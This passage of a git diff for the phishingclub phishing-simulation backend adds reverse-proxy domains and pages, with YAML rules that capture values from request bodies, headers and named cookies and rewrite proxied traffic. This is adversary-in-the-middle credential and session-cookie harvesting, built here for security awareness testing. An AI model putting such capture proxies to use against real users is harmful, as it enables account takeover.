domain not found template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") + } + } + } // clean up if TLS was previous managed but no longer is if 
managedTLS, err := incoming.ManagedTLS.Get(); err == nil && !managedTLS { if wasManagedTLS { @@ -491,11 +630,21 @@ func (d *Domain) UpdateByID( return nil } -// DeleteByID +// DeleteByID deletes a domain by ID func (d *Domain) DeleteByID( ctx context.Context, session *model.Session, id *uuid.UUID, +) error { + return d.deleteDomain(ctx, session, id, false) +} + +// deleteDomain is the internal domain deletion method +func (d *Domain) deleteDomain( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + allowProxyDeletion bool, ) error { ae := NewAuditEvent("Domain.DeleteByID", session) ae.Details["id"] = id.String() @@ -509,6 +658,24 @@ func (d *Domain) DeleteByID( d.AuditLogNotAuthorized(ae) return errs.ErrAuthorizationFailed } + + // get the domain to check if it's a proxy domain + current, err := d.DomainRepository.GetByID(ctx, id, &repository.DomainOption{}) + if errors.Is(err, gorm.ErrRecordNotFound) { + d.Logger.Debugw("domain not found", "error", err) + return err + } + if err != nil { + d.Logger.Errorw("failed to get domain for deletion", "error", err) + return err + } + + // prevent deletion of proxy domains unless explicitly allowed + if !allowProxyDeletion { + if domainType, err := current.Type.Get(); err == nil && domainType.String() == "proxy" { + return validate.WrapErrorWithField(errors.New("proxy domains can only be deleted by deleting the associated proxy configuration"), "domain") + } + } // get the domain domain, err := d.DomainRepository.GetByID( ctx, @@ -696,3 +863,105 @@ func (d *Domain) removeOwnManagedTLS( } return nil } + +// validateProxyDomain validates proxy domain configuration +func (d *Domain) validateProxyDomain(ctx context.Context, domain *model.Domain) error { + // validate proxy target domain format + proxyTargetDomain, err := domain.ProxyTargetDomain.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("proxy target domain is required for proxy domains"), "proxyTargetDomain") + } + + targetDomainStr 
// isValidDomain reports whether domain looks like a syntactically valid
// DNS name: 1-253 bytes, at least two dot-separated labels, and each label
// 1-63 bytes of alphanumerics/dashes with no leading or trailing dash.
func isValidDomain(domain string) bool {
	// overall length bounds
	if domain == "" || len(domain) > 253 {
		return false
	}
	// a bare hostname without a dot is rejected
	if !strings.Contains(domain, ".") {
		return false
	}
	// a leading or trailing dot/dash can never be valid
	switch {
	case strings.HasPrefix(domain, "-"), strings.HasSuffix(domain, "-"),
		strings.HasPrefix(domain, "."), strings.HasSuffix(domain, "."):
		return false
	}
	// every dot-separated label must pass the per-label checks
	for _, label := range strings.Split(domain, ".") {
		if !isValidDomainLabel(label) {
			return false
		}
	}
	return true
}

// isValidDomainLabel reports whether a single DNS label is acceptable:
// non-empty, at most 63 bytes, characters in [A-Za-z0-9-], and not
// starting or ending with a dash.
func isValidDomainLabel(label string) bool {
	if label == "" || len(label) > 63 {
		return false
	}
	if label[0] == '-' || label[len(label)-1] == '-' {
		return false
	}
	for _, c := range label {
		isAlpha := (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
		isDigit := c >= '0' && c <= '9'
		if !isAlpha && !isDigit && c != '-' {
			return false
		}
	}
	return true
}
*model.Session, + proxyID *uuid.UUID, +) (*model.Result[model.Domain], error) { + ae := NewAuditEvent("Domain.GetByProxyID", session) + ae.Details["proxyID"] = proxyID.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + d.LogAuthError(err) + return nil, err + } + if !isAuthorized { + d.AuditLogNotAuthorized(ae) + return nil, errs.ErrAuthorizationFailed + } + result, err := d.DomainRepository.GetByProxyID( + ctx, + proxyID, + &repository.DomainOption{}, + ) + if err != nil { + d.Logger.Errorw("failed to get domains by proxy id", "error", err) + return nil, errs.Wrap(err) + } + // no audit on read + return result, nil +} diff --git a/backend/service/page.go b/backend/service/page.go index ff7b98c..0464a1c 100644 --- a/backend/service/page.go +++ b/backend/service/page.go @@ -2,8 +2,12 @@ package service import ( "context" + "net/url" + "regexp" + "strings" "github.com/go-errors/errors" + "gopkg.in/yaml.v3" "github.com/google/uuid" "github.com/phishingclub/phishingclub/data" @@ -11,6 +15,7 @@ import ( "github.com/phishingclub/phishingclub/model" "github.com/phishingclub/phishingclub/repository" "github.com/phishingclub/phishingclub/validate" + "github.com/phishingclub/phishingclub/vo" "gorm.io/gorm" ) @@ -21,6 +26,40 @@ type Page struct { CampaignRepository *repository.Campaign CampaignTemplateService *CampaignTemplate TemplateService *Template + DomainRepository *repository.Domain +} + +// ProxyConfig represents the YAML configuration for proxy pages +type ProxyConfig struct { + Default map[string]interface{} `yaml:"default,omitempty"` + Hosts map[string]ProxyHostConfig `yaml:",inline"` +} + +// ProxyHostConfig represents configuration for a specific host +type ProxyHostConfig struct { + Proxy string `yaml:"proxy,omitempty"` + Domain string `yaml:"domain,omitempty"` + Capture []ProxyCaptureRule `yaml:"capture,omitempty"` + Replace 
[]ProxyReplaceRule `yaml:"replace,omitempty"` +} + +// ProxyCaptureRule represents a capture rule +type ProxyCaptureRule struct { + Name string `yaml:"name"` + Method string `yaml:"method,omitempty"` + Path string `yaml:"path,omitempty"` + Pattern string `yaml:"pattern,omitempty"` + Find string `yaml:"find"` + From string `yaml:"from,omitempty"` + Required *bool `yaml:"required,omitempty"` +} + +// ProxyReplaceRule represents a replace rule +type ProxyReplaceRule struct { + Name string `yaml:"name"` + Find string `yaml:"find"` + Replace string `yaml:"replace"` + From string `yaml:"from,omitempty"` } // Create creates a new page @@ -50,11 +89,20 @@ func (p *Page) Create( p.Logger.Errorw("failed to validate page", "error", err) return nil, errs.Wrap(err) } - // validate template content if present - if content, err := page.Content.Get(); err == nil { - if err := p.TemplateService.ValidatePageTemplate(content.String()); err != nil { - p.Logger.Errorw("failed to validate page template", "error", err) - return nil, validate.WrapErrorWithField(errors.New("invalid template: "+err.Error()), "content") + // validate based on page type + pageType, _ := page.Type.Get() + if pageType.String() == "proxy" { + // validate proxy configuration + if err := p.validateProxyPage(ctx, page); err != nil { + return nil, err + } + } else { + // validate template content for regular pages + if content, err := page.Content.Get(); err == nil { + if err := p.TemplateService.ValidatePageTemplate(content.String()); err != nil { + p.Logger.Errorw("failed to validate page template", "error", err) + return nil, validate.WrapErrorWithField(errors.New("invalid template: "+err.Error()), "content") + } } } // check uniqueness @@ -260,14 +308,35 @@ func (p *Page) UpdateByID( } current.Name.Set(v) } + if v, err := page.Type.Get(); err == nil { + current.Type.Set(v) + } + if v, err := page.TargetURL.Get(); err == nil { + current.TargetURL.Set(v) + } + if v, err := page.ProxyConfig.Get(); err == nil { + 
current.ProxyConfig.Set(v) + } if v, err := page.Content.Get(); err == nil { - // validate template content before updating - if err := p.TemplateService.ValidatePageTemplate(v.String()); err != nil { - p.Logger.Errorw("failed to validate page template", "error", err) - return validate.WrapErrorWithField(errors.New("invalid template: "+err.Error()), "content") - } current.Content.Set(v) } + + // validate based on updated page type + updatedPageType, _ := current.Type.Get() + if updatedPageType.String() == "proxy" { + // validate proxy configuration + if err := p.validateProxyPage(ctx, current); err != nil { + return err + } + } else { + // validate template content for regular pages + if content, err := current.Content.Get(); err == nil { + if err := p.TemplateService.ValidatePageTemplate(content.String()); err != nil { + p.Logger.Errorw("failed to validate page template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid template: "+err.Error()), "content") + } + } + } // update page err = p.PageRepository.UpdateByID( ctx, @@ -284,6 +353,121 @@ func (p *Page) UpdateByID( return nil } +// validateProxyPage validates proxy page configuration +func (p *Page) validateProxyPage(ctx context.Context, page *model.Page) error { + // validate target URL format + targetURL, err := page.TargetURL.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("target URL is required for proxy pages"), "targetURL") + } + + parsedURL, err := url.Parse(targetURL.String()) + if err != nil || parsedURL.Scheme == "" || parsedURL.Host == "" { + return validate.WrapErrorWithField(errors.New("invalid target URL format - must be a valid HTTP or HTTPS URL"), "targetURL") + } + + if parsedURL.Scheme != "http" && parsedURL.Scheme != "https" { + return validate.WrapErrorWithField(errors.New("target URL must use HTTP or HTTPS protocol"), "targetURL") + } + + // validate proxy configuration YAML + proxyConfig, err := page.ProxyConfig.Get() + if err != nil { + 
return validate.WrapErrorWithField(errors.New("proxy configuration is required for proxy pages"), "proxyConfig") + } + + var config ProxyConfig + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return validate.WrapErrorWithField(errors.New("invalid YAML format: "+err.Error()), "proxyConfig") + } + + // validate that all referenced domains in the config support proxy + for hostname, hostConfig := range config.Hosts { + if hostConfig.Domain != "" { + domainName, err := vo.NewString255(hostConfig.Domain) + if err != nil { + return validate.WrapErrorWithField( + errors.New("invalid domain name format"), + "proxyConfig", + ) + } + + _, err = p.DomainRepository.GetByName(ctx, domainName, &repository.DomainOption{}) + if err != nil { + if errors.Is(err, gorm.ErrRecordNotFound) { + return validate.WrapErrorWithField( + errors.New("referenced domain '"+hostConfig.Domain+"' not found"), + "proxyConfig", + ) + } + return err + } + } + + // validate capture rules + for _, capture := range hostConfig.Capture { + if capture.Name == "" { + return validate.WrapErrorWithField(errors.New("capture rule name is required"), "proxyConfig") + } + if capture.Pattern == "" && capture.Path == "" { + return validate.WrapErrorWithField( + errors.New("capture rule must have either pattern or path"), + "proxyConfig", + ) + } + if capture.Pattern != "" { + if _, err := regexp.Compile(capture.Pattern); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern in capture rule: "+err.Error()), + "proxyConfig", + ) + } + } + if capture.Path != "" { + if _, err := regexp.Compile(capture.Path); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern for path in capture rule: "+err.Error()), + "proxyConfig", + ) + } + } + if capture.From != "" { + validFromValues := []string{"request_body", "request_header", "response_body", "response_header", "any"} + valid := false + for _, validFrom := range validFromValues { 
+ if capture.From == validFrom { + valid = true + break + } + } + if !valid { + return validate.WrapErrorWithField( + errors.New("invalid 'from' value in capture rule, must be one of: "+strings.Join(validFromValues, ", ")), + "proxyConfig", + ) + } + } + } + + // validate replace rules + for _, replace := range hostConfig.Replace { + if replace.Find == "" { + return validate.WrapErrorWithField(errors.New("replace rule 'find' is required"), "proxyConfig") + } + if _, err := regexp.Compile(replace.Find); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern in replace rule 'find': "+err.Error()), + "proxyConfig", + ) + } + } + + p.Logger.Debugw("validated proxy host config", "hostname", hostname) + } + + return nil +} + // DeleteByID deletes a page by ID func (p *Page) DeleteByID( ctx context.Context, diff --git a/backend/service/proxy.go b/backend/service/proxy.go new file mode 100644 index 0000000..8769d90 --- /dev/null +++ b/backend/service/proxy.go @@ -0,0 +1,1762 @@ +package service + +import ( + "context" + "fmt" + "net/url" + "regexp" + "strings" + + "github.com/go-errors/errors" + "github.com/oapi-codegen/nullable" + "gopkg.in/yaml.v3" + + "github.com/google/uuid" + "github.com/phishingclub/phishingclub/data" + "github.com/phishingclub/phishingclub/errs" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/repository" + "github.com/phishingclub/phishingclub/validate" + "github.com/phishingclub/phishingclub/vo" + "gorm.io/gorm" +) + +// Proxy is a Proxy service +type Proxy struct { + Common + ProxyRepository *repository.Proxy + DomainRepository *repository.Domain + CampaignRepository *repository.Campaign + CampaignTemplateService *CampaignTemplate + DomainService *Domain +} + +// ProxyServiceConfig represents the YAML configuration for proxy +type ProxyServiceConfig struct { + Proxy string `yaml:"proxy,omitempty"` + Global *ProxyServiceRules `yaml:"global,omitempty"` +} + +// 
// ProxyServiceDomainConfig represents configuration for a specific domain mapping:
// the phishing domain it maps to plus per-domain capture/rewrite rules.
type ProxyServiceDomainConfig struct {
	To      string                    `yaml:"to"`
	Capture []ProxyServiceCaptureRule `yaml:"capture,omitempty"`
	Rewrite []ProxyServiceReplaceRule `yaml:"rewrite,omitempty"`
}

// ProxyServiceRules represents global rules that apply to all hosts.
type ProxyServiceRules struct {
	Capture []ProxyServiceCaptureRule `yaml:"capture,omitempty"`
	Rewrite []ProxyServiceReplaceRule `yaml:"rewrite,omitempty"`
}

// ProxyServiceCaptureRule represents a capture rule.
// PathRe is populated by CompilePathPatterns and is never serialized.
type ProxyServiceCaptureRule struct {
	Name     string         `yaml:"name"`
	Method   string         `yaml:"method,omitempty"`
	Path     string         `yaml:"path,omitempty"`
	Find     string         `yaml:"find,omitempty"`
	From     string         `yaml:"from,omitempty"`
	Required *bool          `yaml:"required,omitempty"`
	PathRe   *regexp.Regexp `yaml:"-"` // compiled regex for path matching
}

// ProxyServiceReplaceRule represents a replacement rule.
type ProxyServiceReplaceRule struct {
	Name    string `yaml:"name,omitempty"`
	Find    string `yaml:"find"`
	Replace string `yaml:"replace"`
	From    string `yaml:"from,omitempty"`
}

// ProxyServiceConfigYAML represents the complete YAML configuration structure
// that matches the actual YAML format.
type ProxyServiceConfigYAML struct {
	Version string                               `yaml:"version,omitempty"`
	Proxy   string                               `yaml:"proxy,omitempty"`
	Global  *ProxyServiceRules                   `yaml:"global,omitempty"`
	Hosts   map[string]*ProxyServiceDomainConfig `yaml:",inline"` // inline allows domain names as top-level keys
}

// CompilePathPatterns compiles the regex path patterns for every capture rule,
// both in the global section and in each host-specific section. It mutates the
// rules in place (filling PathRe) and returns the first compile error found.
func CompilePathPatterns(config *ProxyServiceConfigYAML) error {
	// shared walker so global and host rules get identical treatment
	compileAll := func(rules []ProxyServiceCaptureRule) error {
		for i := range rules {
			if err := compileCapturePath(&rules[i]); err != nil {
				return err
			}
		}
		return nil
	}
	if config.Global != nil {
		if err := compileAll(config.Global.Capture); err != nil {
			return err
		}
	}
	for _, hostConfig := range config.Hosts {
		if hostConfig == nil {
			continue
		}
		if err := compileAll(hostConfig.Capture); err != nil {
			return err
		}
	}
	return nil
}

// compileCapturePath compiles the path pattern for a single capture rule.
// Rules without a path are left untouched.
func compileCapturePath(rule *ProxyServiceCaptureRule) error {
	if rule.Path == "" {
		return nil
	}
	re, err := regexp.Compile(rule.Path)
	if err != nil {
		return fmt.Errorf("invalid regex pattern for path '%s': %w", rule.Path, err)
	}
	rule.PathRe = re
	return nil
}

// ValidateVersion validates that the configuration version is supported.
// Only version "0.0" is accepted.
func ValidateVersion(config *ProxyServiceConfigYAML) error {
	if config.Version == "0.0" {
		return nil
	}
	return errors.New("only version 0.0 is supported")
}
errs.Wrap(err) + } + if !isOK { + m.Logger.Debugw("proxy name is already taken", "name", name.String()) + return nil, validate.WrapErrorWithField(errors.New("is not unique"), "name") + } + + // create proxy + id, err := m.ProxyRepository.Insert( + ctx, + proxy, + ) + if err != nil { + m.Logger.Errorw("failed to create proxy", "error", err) + return nil, errs.Wrap(err) + } + + // create associated domains + err = m.createProxyDomains(ctx, session, id, proxy) + if err != nil { + // rollback proxy creation + m.ProxyRepository.DeleteByID(ctx, id) + m.Logger.Errorw("failed to create proxy domains", "error", err) + return nil, errs.Wrap(err) + } + + ae.Details["id"] = id.String() + m.AuditLogAuthorized(ae) + + return id, nil +} + +// GetAll gets proxies +func (m *Proxy) GetAll( + ctx context.Context, + session *model.Session, + companyID *uuid.UUID, + options *repository.ProxyOption, +) (*model.Result[model.Proxy], error) { + result := model.NewEmptyResult[model.Proxy]() + ae := NewAuditEvent("Proxy.GetAll", session) + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return result, errs.Wrap(err) + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return result, errs.ErrAuthorizationFailed + } + result, err = m.ProxyRepository.GetAll( + ctx, + companyID, + options, + ) + if err != nil { + m.Logger.Errorw("failed to get proxies", "error", err) + return result, errs.Wrap(err) + } + // no audit log on read + return result, nil +} + +// GetAllOverview gets proxies with limited data +func (m *Proxy) GetAllOverview( + companyID *uuid.UUID, // can be null + ctx context.Context, + session *model.Session, + queryArgs *vo.QueryArgs, +) (*model.Result[model.ProxyOverview], error) { + result := model.NewEmptyResult[model.ProxyOverview]() + ae := NewAuditEvent("Proxy.GetAllOverview", session) + // check permissions + isAuthorized, err := 
IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return result, errs.Wrap(err) + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return result, errs.ErrAuthorizationFailed + } + // get proxies + result, err = m.ProxyRepository.GetAllSubset( + ctx, + companyID, + &repository.ProxyOption{ + QueryArgs: queryArgs, + }, + ) + if err != nil { + m.Logger.Errorw("failed to get proxies subset", "error", err) + return result, errs.Wrap(err) + } + // no audit log on read + return result, nil +} + +// GetByID gets a Proxy by ID +func (m *Proxy) GetByID( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + options *repository.ProxyOption, +) (*model.Proxy, error) { + ae := NewAuditEvent("Proxy.GetByID", session) + ae.Details["id"] = id.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return nil, errs.Wrap(err) + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return nil, errs.ErrAuthorizationFailed + } + // get proxy + proxy, err := m.ProxyRepository.GetByID( + ctx, + id, + options, + ) + if errors.Is(err, gorm.ErrRecordNotFound) { + // return early this is not a an error + return nil, errs.Wrap(err) + } + if err != nil { + m.Logger.Errorw("failed to get proxy by ID", "error", err) + return nil, errs.Wrap(err) + } + + // apply defaults to Proxy configuration for display + if err := m.applyConfigurationDefaults(proxy); err != nil { + m.Logger.Errorw("failed to apply configuration defaults", "error", err) + // don't fail the request, just log the error + } + + // no audit log on read + return proxy, nil +} + +// UpdateByID updates a Proxy by ID +func (m *Proxy) UpdateByID( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + proxy *model.Proxy, +) error { + ae := NewAuditEvent("Proxy.UpdateByID", 
session) + ae.Details["id"] = id.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return err + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return errs.ErrAuthorizationFailed + } + // get current + current, err := m.ProxyRepository.GetByID( + ctx, + id, + &repository.ProxyOption{}, + ) + if errors.Is(err, gorm.ErrRecordNotFound) { + m.Logger.Debugw("failed to update proxy by ID", "error", err) + return err + } + if err != nil { + m.Logger.Errorw("failed to update proxy by ID", "error", err) + return err + } + // update proxy - if a field is present and not null, update it + if v, err := proxy.Name.Get(); err == nil { + // check uniqueness + var companyID *uuid.UUID + if cid, err := current.CompanyID.Get(); err == nil { + companyID = &cid + } + name := proxy.Name.MustGet() + isOK, err := repository.CheckNameIsUnique( + ctx, + m.ProxyRepository.DB, + "proxies", + name.String(), + companyID, + id, + ) + if err != nil { + m.Logger.Errorw("failed to check proxy uniqueness", "error", err) + return err + } + if !isOK { + m.Logger.Debugw("proxy name is already taken", "name", name.String()) + return validate.WrapErrorWithField(errors.New("is not unique"), "name") + } + current.Name.Set(v) + } + if v, err := proxy.Description.Get(); err == nil { + current.Description.Set(v) + } + if v, err := proxy.StartURL.Get(); err == nil { + current.StartURL.Set(v) + } + if v, err := proxy.ProxyConfig.Get(); err == nil { + current.ProxyConfig.Set(v) + } + + // validate updated Proxy configuration + if err := m.validateProxyConfigForUpdate(ctx, current, id); err != nil { + return err + } + + // update proxy + err = m.ProxyRepository.UpdateByID( + ctx, + id, + current, + ) + if err != nil { + m.Logger.Errorw("failed to update proxy by ID", "error", err) + return err + } + + // update associated domains + err = m.syncProxyDomains(ctx, 
session, id, current) + if err != nil { + m.Logger.Errorw("failed to sync proxy domains", "error", err) + return err + } + + ae.Details["id"] = id.String() + m.AuditLogAuthorized(ae) + + return nil +} + +// validateProxyConfigForUpdate validates Proxy configuration during update, allowing same domains for same proxy +func (m *Proxy) validateProxyConfigForUpdate(ctx context.Context, proxy *model.Proxy, proxyID *uuid.UUID) error { + // validate Proxy configuration YAML + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("Proxy configuration is required"), "proxyConfig") + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return validate.WrapErrorWithField(errors.New("invalid YAML format: "+err.Error()), "proxyConfig") + } + + // set default values + m.setProxyConfigDefaults(&config) + + // validate version (after defaults are applied) + if err := ValidateVersion(&config); err != nil { + return validate.WrapErrorWithField(err, "proxyConfig") + } + + // validate that at least one domain mapping exists + if len(config.Hosts) == 0 { + return validate.WrapErrorWithField(errors.New("at least one domain mapping must be specified"), "proxyConfig") + } + + // validate global uniqueness of capture names across all domains and global rules + if err := m.validateGlobalCaptureNameUniqueness(&config); err != nil { + return err + } + + // ensure that the start URL domain is mentioned in the domain mappings + startURL, err := proxy.StartURL.Get() + if err == nil { + startURLStr := startURL.String() + var startDomain string + + // extract domain from start URL + if strings.Contains(startURLStr, "://") { + // full URL like https://auth.example.com/login + parts := strings.Split(startURLStr, "://") + if len(parts) > 1 { + domainParts := strings.Split(parts[1], "/") + startDomain = domainParts[0] + } + } else if 
strings.Contains(startURLStr, "/") { + // domain/path format like auth.example.com/login + parts := strings.Split(startURLStr, "/") + startDomain = parts[0] + } else { + // just domain like auth.example.com + startDomain = startURLStr + } + + // check if start domain is in the domain mappings + if startDomain != "" { + found := false + for originalDomain := range config.Hosts { + if originalDomain == startDomain { + found = true + break + } + } + if !found { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("start URL domain '%s' must be included in domain mappings", startDomain)), + "proxyConfig", + ) + } + } + } + + // validate each domain mapping + for originalDomain, domainConfig := range config.Hosts { + if domainConfig == nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain config for '%s' is nil", originalDomain)), + "proxyConfig", + ) + } + + // validate that 'to' is specified + if domainConfig.To == "" { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("'to' field is required for domain '%s'", originalDomain)), + "proxyConfig", + ) + } + + // validate domain-specific capture rules + if err := m.validateCaptureRules(domainConfig.Capture); err != nil { + return err + } + + // validate domain-specific rewrite rules + if err := m.validateReplaceRules(domainConfig.Rewrite); err != nil { + return err + } + + // note: domain uniqueness validation is skipped during updates + // the syncProxyDomains method will handle domain management properly + } + + // validate global capture and rewrite rules + if config.Global != nil { + if err := m.validateCaptureRules(config.Global.Capture); err != nil { + return err + } + if err := m.validateReplaceRules(config.Global.Rewrite); err != nil { + return err + } + } + + return nil +} + +// validateCaptureRules validates a slice of capture rules +func (m *Proxy) validateCaptureRules(captureRules []ProxyServiceCaptureRule) error { + // track capture names to prevent duplicates + 
captureNames := make(map[string]bool) + + for _, capture := range captureRules { + if capture.Name == "" { + return validate.WrapErrorWithField(errors.New("capture rule name is required"), "proxyConfig") + } + + // check for duplicate capture names + if captureNames[capture.Name] { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("duplicate capture rule name '%s' found - each capture rule must have a unique name", capture.Name)), + "proxyConfig", + ) + } + captureNames[capture.Name] = true + + if capture.Path == "" { + return validate.WrapErrorWithField(errors.New("capture rule path is required"), "proxyConfig") + } + + // allow empty find pattern for any method path-based navigation tracking + isNavigationTracking := capture.Path != "" && capture.Find == "" + + if capture.Find == "" && !isNavigationTracking { + return validate.WrapErrorWithField( + errors.New("capture rule must have a find pattern, except for path-based navigation tracking"), + "proxyConfig", + ) + } + + if capture.Find != "" { + // for cookie captures, find field contains cookie name (literal string) + // for other captures, find field contains regex pattern + if capture.From != "cookie" { + if _, err := regexp.Compile(capture.Find); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern in capture rule: "+err.Error()), + "proxyConfig", + ) + } + } + } + + // 'from' field defaults to 'any' if not specified (handled in setProxyConfigDefaults) + // validate 'from' field if specified + if capture.From != "" { + validFromValues := []string{"request_body", "request_header", "response_body", "response_header", "cookie", "any"} + valid := false + for _, validFrom := range validFromValues { + if capture.From == validFrom { + valid = true + break + } + } + if !valid { + return validate.WrapErrorWithField( + errors.New("invalid 'from' value in capture rule, must be one of: "+strings.Join(validFromValues, ", ")), + "proxyConfig", + ) + } + } + + // validate 
cookie-specific rules + if capture.From == "cookie" { + if capture.Find == "" { + return validate.WrapErrorWithField( + errors.New("capture rule with from='cookie' must specify cookie name in 'find' field"), + "proxyConfig", + ) + } + + // validate cookie name format (basic validation) + cookieName := capture.Find + if len(cookieName) == 0 { + return validate.WrapErrorWithField( + errors.New("cookie name cannot be empty"), + "proxyConfig", + ) + } + + // cookie names cannot contain certain characters + invalidChars := []string{" ", "\t", "\n", "\r", "=", ";", ","} + for _, char := range invalidChars { + if strings.Contains(cookieName, char) { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("cookie name '%s' contains invalid character '%s'", cookieName, char)), + "proxyConfig", + ) + } + } + + // method should be specified for cookie captures + if capture.Method == "" { + return validate.WrapErrorWithField( + errors.New("capture rule with from='cookie' should specify HTTP method"), + "proxyConfig", + ) + } + } + } + return nil +} + +// setProxyConfigDefaults sets default values for Proxy configuration after YAML parsing +func (m *Proxy) setProxyConfigDefaults(config *ProxyServiceConfigYAML) { + // set default version to 0.0 if not specified + if config.Version == "" { + config.Version = "0.0" + } + + for domain, domainConfig := range config.Hosts { + for i := range domainConfig.Capture { + // set default required to true if not specified + if domainConfig.Capture[i].Required == nil { + trueValue := true + domainConfig.Capture[i].Required = &trueValue + } + // set default 'from' to 'any' if not specified + if domainConfig.Capture[i].From == "" { + domainConfig.Capture[i].From = "any" + } + } + config.Hosts[domain] = domainConfig + } + + // set defaults for global capture rules + if config.Global != nil { + for i := range config.Global.Capture { + // set default required to true if not specified + if config.Global.Capture[i].Required == nil { + 
trueValue := true + config.Global.Capture[i].Required = &trueValue + } + // set default 'from' to 'any' if not specified + if config.Global.Capture[i].From == "" { + config.Global.Capture[i].From = "any" + } + } + } +} + +// validateReplaceRules validates a slice of replace rules +func (m *Proxy) validateReplaceRules(replaceRules []ProxyServiceReplaceRule) error { + for _, replace := range replaceRules { + if replace.Find == "" { + return validate.WrapErrorWithField(errors.New("replace rule 'find' is required"), "proxyConfig") + } + if _, err := regexp.Compile(replace.Find); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern in replace rule 'find': "+err.Error()), + "proxyConfig", + ) + } + if replace.From != "" { + validFromValues := []string{"request_body", "request_header", "response_body", "response_header", "any"} + valid := false + for _, validFrom := range validFromValues { + if replace.From == validFrom { + valid = true + break + } + } + if !valid { + return validate.WrapErrorWithField( + errors.New("invalid 'from' value in replace rule, must be one of: "+strings.Join(validFromValues, ", ")), + "proxyConfig", + ) + } + } + } + return nil +} + +// validateProxyConfig validates Proxy configuration +func (m *Proxy) validateProxyConfig(ctx context.Context, proxy *model.Proxy) error { + // validate Proxy configuration YAML + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("Proxy configuration is required"), "proxyConfig") + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return validate.WrapErrorWithField(errors.New("invalid YAML format: "+err.Error()), "proxyConfig") + } + + // set default values + m.setProxyConfigDefaults(&config) + + // validate version (after defaults are applied) + if err := ValidateVersion(&config); err != nil { + return 
validate.WrapErrorWithField(err, "proxyConfig") + } + + // validate that at least one domain mapping exists + if len(config.Hosts) == 0 { + return validate.WrapErrorWithField(errors.New("at least one domain mapping must be specified"), "proxyConfig") + } + + // validate global uniqueness of capture names across all domains and global rules + if err := m.validateGlobalCaptureNameUniqueness(&config); err != nil { + return err + } + + // ensure that the start URL domain is mentioned in the domain mappings + startURL, err := proxy.StartURL.Get() + if err == nil { + startURLStr := startURL.String() + var startDomain string + + // extract domain from start URL + if strings.Contains(startURLStr, "://") { + // full URL like https://auth.example.com/login + parts := strings.Split(startURLStr, "://") + if len(parts) > 1 { + domainParts := strings.Split(parts[1], "/") + startDomain = domainParts[0] + } + } else if strings.Contains(startURLStr, "/") { + // domain/path format like auth.example.com/login + parts := strings.Split(startURLStr, "/") + startDomain = parts[0] + } else { + // just domain like auth.example.com + startDomain = startURLStr + } + + // check if start domain is in the domain mappings + if startDomain != "" { + found := false + for originalDomain := range config.Hosts { + if originalDomain == startDomain { + found = true + break + } + } + if !found { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("start URL domain '%s' must be included in domain mappings", startDomain)), + "proxyConfig", + ) + } + } + } + + // validate each domain mapping + for originalDomain, domainConfig := range config.Hosts { + if domainConfig == nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain config for '%s' is nil", originalDomain)), + "proxyConfig", + ) + } + + // validate that 'to' is specified + if domainConfig.To == "" { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("'to' field is required for domain mapping '%s'", 
